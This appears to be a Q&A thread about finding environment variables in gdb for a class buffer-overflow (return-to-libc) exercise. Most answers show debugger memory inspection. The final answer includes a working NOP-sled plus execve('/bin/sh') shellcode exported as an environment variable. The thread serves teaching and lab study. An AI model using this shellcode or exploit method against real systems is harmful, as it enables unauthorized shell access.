# Finding environment variables with gdb, to exploit a buffer overflow

Tags: exploit, unix, buffer-overflow

I have to exploit a very simple buffer overflow in a vulnerable C++ program for an assignment and I am not being able to find the environment variable SHELL.

I have never worked with BoF before, and after reading lots of similar questions, posts, etc. I have this information (correct me if it's wrong):

- The program stores the environment variables in a global variable called `environ`
- I can find the address of this variable like this:

  ```
  (gdb) info variable environ
  All variables matching regular expression "environ":

  Non-debugging symbols:
  0xb7fd1b00  __environ
  0xb7fd1b00  _environ
  0xb7fd1b00  environ
  ```
- I need to find the `/bin/bash` string in that variable to launch a shell (I have already got the system and exit addresses, I only need the route to the shell). And here is where I don't know what to do. I have been reading gdb tutorials, but still nothing. `x/s 0xb7fd1b00` does not output anything useful.

Answer (score 23, accepted):

`environ` is a pointer to pointer, as it has the type `char **environ`.

You have to try something like:

```
(gdb) x/s *((char **)environ)
0xbffff688:      "SSH_AGENT_PID=2107"
(gdb) x/s *((char **)environ+1)
0xbffff69b:      "SHELL=/bin/bash"
```

Comment: That's it!! Thanks a lot :) I had managed to get the address just with `x/s environ` and TONS of "enter"s, but it wasn't very nice :P

Comment: A lot easier to remember x/s *environ If you need to see multiple variables... x/5s *environ

Comment: I get "Cannot access memory at address ..." . Possible memory-read protection in RHEL 6 systems??

Answer (score 5):

- Environment variables are 16 bytes from the base pointer (%ebp).
- Put a break point in the main function and do this,

> (gdb) x/wx $ebp+0x10 
>  0xffffd3f8:    0xffffd48c
>  (gdb) x/wx
>   0xffffd48c
>  0xffffd48c:   0xffffd67e
>  (gdb) x/s 0xffffd67e
>   0xffffd67e:   "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0"
>   (gdb) (gdb) x/wx 0xffffd48c+4
>  0xffffd490:    0xffffd6b2
>  (gdb)
>   x/s 0xffffd6b2
>   0xffffd6b2:   "XDG_CONFIG_DIRS=/etc/xdg/lubuntu:/etc/xdg/xdg-Lubuntu:/usr/share/upstart/xdg:/etc/xdg"

[Refer this blog](https://shankaraman.wordpress.com/2015/06/07/finding-the-environment-variables-on-the-stack/)

Answer (score 2):

if you have [peda](https://github.com/longld/peda) installed for gdb, then you could simply type this in gdb:

```
gdb-peda$ searchmem SHELL
```

The output would show

```
Searching for 'SHELL' in: None ranges
Found 1 results, display max 1 items:
[stack] : 0xbffff540 ("SHELL=/bin/bash")
```

Answer (score 0):

Also you can use just "refsearch variable_name" if you have peda installed for gdb.

example:

First of all you should add variable (something like Shellcode) to environment.

```
(export Shellcode=$(python -c 'print "\x90"*100 +"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"'))
```

Then open gdb with sample program, break main and run.

When the program pause on the breakpoint, you can search the environment address following command.

refsearch Shellcode